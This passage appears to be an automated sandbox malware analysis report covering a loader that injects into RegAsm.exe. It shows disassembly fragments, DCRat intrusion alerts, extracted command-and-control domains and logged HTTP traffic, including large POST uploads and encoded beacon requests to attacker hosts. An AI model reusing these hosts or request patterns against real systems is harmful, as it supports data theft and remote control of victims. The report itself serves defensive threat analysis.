                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov esi, ebx12_2_00A2E891
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov word ptr [edi], ax12_2_00A2C8C0
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, dword ptr [esi+000007F0h]12_2_00A1C033
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov edi, dword ptr [esi]12_2_00A1081C
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]12_2_00A0A84C
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then movzx ecx, word ptr [ebp+ebx*4+00h]12_2_009FE958
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov edx, dword ptr [esi+04h]12_2_00A2E968
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov byte ptr [edx], al12_2_00A1CB3B
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, dword ptr [esi+00000100h]12_2_00A1CB3B
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov byte ptr [edi], al12_2_00A1CB3B
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then jmp eax12_2_00A1AB1F
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov byte ptr [edx], al12_2_00A1CB3B
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, dword ptr [esi+00000100h]12_2_00A1CB3B
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov byte ptr [edi], al12_2_00A1CB3B
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]12_2_00A06DAB
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then jmp eax12_2_00A0CDBF
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]12_2_00A1AEB8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]12_2_009F8E28
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]12_2_00A18F9F
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]12_2_00A0B1F2
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, dword ptr [esi]12_2_00A15388
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edi]12_2_009FF3F8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]12_2_00A2F358
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then inc ebx12_2_00A094B8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, edx12_2_00A0B458
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, ecx12_2_00A1D5E3
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]12_2_00A2F518
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov byte ptr [edi], dl12_2_00A1D568
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h12_2_00A0D54F
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov edi, dword ptr [esi]12_2_00A056D8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then jmp ecx12_2_00A2D780
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then jmp eax12_2_00A0776A
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then jmp eax12_2_009F776E
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]12_2_00A038C8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then jmp eax12_2_00A0B9A1
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov ebx, eax12_2_009F99B8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov edx, dword ptr [esp]12_2_009FFD98
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 02286B4Eh12_2_00A2FDF8
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then jmp edx12_2_00A13D0C
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then jmp edx12_2_00A13D18
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov edx, dword ptr [esp]12_2_00A2DE8A
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then mov word ptr [eax], cx12_2_00A19E99
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then push ebx12_2_00A07EEB
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeCode function: 4x nop then jmp eax12_2_00A13E7F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edi], ax13_2_004368C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]13_2_0042823E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], al13_2_00426B43
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000100h]13_2_00426B43
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al13_2_00426B43
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]13_2_00439360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi]13_2_0041F309
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax13_2_00416DF9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h13_2_00416EEE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx13_2_00423EA1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx13_2_004347E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]13_2_00414854
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [00441C90h]13_2_00420073
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, word ptr [edx]13_2_00420073
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [esi]13_2_0041A824
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+000007F0h]13_2_0042603B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]13_2_0040D8D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [ebp+ebx*4+00h]13_2_00408960
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [00440144h]13_2_00412161
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax13_2_00438170
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx13_2_00438170
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, ebx13_2_00438170
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esi+04h]13_2_00438970
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax13_2_004039C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]13_2_004141CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]13_2_004151FA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax13_2_004159A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax13_2_00401278
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]13_2_00422A7B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax13_2_00424B27
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx13_2_0041DC5C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax13_2_0041DC5C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx13_2_0041DC5C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, edx13_2_00415460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], al13_2_00426B43
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+00000100h]13_2_00426B43
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al13_2_00426B43
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edi]13_2_00409400
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then inc ebx13_2_004134C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp]13_2_00437CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax13_2_00437CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx13_2_00437CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, ebx13_2_00437CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], dl13_2_00427570
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]13_2_00439520
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax13_2_00416DCB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, ecx13_2_004275EB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp]13_2_00437DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax13_2_00437DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx13_2_00437DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, ebx13_2_00437DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, dword ptr [esp]13_2_00409DA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]13_2_00410DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp edx13_2_0041DE72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax13_2_0041DE72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx13_2_0041DE72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 02286B4Eh13_2_00439E00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, edi13_2_00407684
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]13_2_00402E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]13_2_00424EC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, dword ptr [esi]13_2_0040F6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]13_2_004266E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+000007F0h]13_2_004266E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]13_2_004266E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esi+000007F0h]13_2_004266E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push ebx13_2_00411EF3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, edi13_2_00407684
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, edi13_2_00407684
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax13_2_00411772
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]13_2_00430710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax13_2_00437FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx13_2_00437FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, ebx13_2_00437FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx13_2_00437788

                      Networking

                      barindex
                      Source: TrafficSnort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 92.53.96.121:80 -> 192.168.2.4:49745
                      Source: TrafficSnort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 92.53.96.121:80 -> 192.168.2.4:49762
                      Source: TrafficSnort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 92.53.96.121:80 -> 192.168.2.4:49773
                      Source: TrafficSnort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 92.53.96.121:80 -> 192.168.2.4:49784
                      Source: Malware configuration extractorURLs: facilitycoursedw.shop
                      Source: Malware configuration extractorURLs: doughtdrillyksow.shop
                      Source: Malware configuration extractorURLs: disappointcredisotw.shop
                      Source: Malware configuration extractorURLs: bargainnygroandjwk.shop
                      Source: Malware configuration extractorURLs: injurypiggyoewirog.shop
                      Source: Malware configuration extractorURLs: leafcalfconflcitw.shop
                      Source: Malware configuration extractorURLs: computerexcudesp.shop
                      Source: Malware configuration extractorURLs: publicitycharetew.shop
                      Source: Malware configuration extractorURLs: backcreammykiel.shop
                      Source: Malware configuration extractorURLs: http://ck66916.tw1.ru/@==gbJBzYuFDT
                      Source: Yara matchFile source: 15.0.Bypass.exe.7f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\ProgramData\SoftwareDistribution\Bypass.exe, type: DROPPED
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                      Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                      Source: Joe Sandbox ViewIP Address: 92.53.96.121 92.53.96.121
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: TIMEWEB-ASRU TIMEWEB-ASRU
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknownDNS query: name: ipinfo.io
                      Source: unknownDNS query: name: ipinfo.io
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: backcreammykiel.shop
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: backcreammykiel.shop
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18166Host: backcreammykiel.shop
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8787Host: backcreammykiel.shop
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20440Host: backcreammykiel.shop
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5447Host: backcreammykiel.shop
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1266Host: backcreammykiel.shop
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 565822Host: backcreammykiel.shop
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 92Host: backcreammykiel.shop
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?iUu=8R7Isg&ee5ae8efe50125d60098b1ca132932bc=49479fbd79a245ee458d40f1dd85aa54&650a0c21718513cd4feada722441e9dc=gMjRGOkJjYmNWNxMmYiZzMiVTN1UmNhBzNzMTZldTY4kTYxUWNwQmN&iUu=8R7Isg HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiI2kDO5gzN1YmYiBDOwQmN5AjNllDM4cTO2EDM5UTNklTY3MzMidDOhJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&37532c7004eeb8757d3cb2e9a0f20a99=0VfiAjRaxmUuNGaSNzYnRzVh5mVIJWUCNFTntGVNZTUU5kNBRUTnFlaNdXS6xkMBpHT6lkeXJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiI2kDO5gzN1YmYiBDOwQmN5AjNllDM4cTO2EDM5UTNklTY3MzMidDOhJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
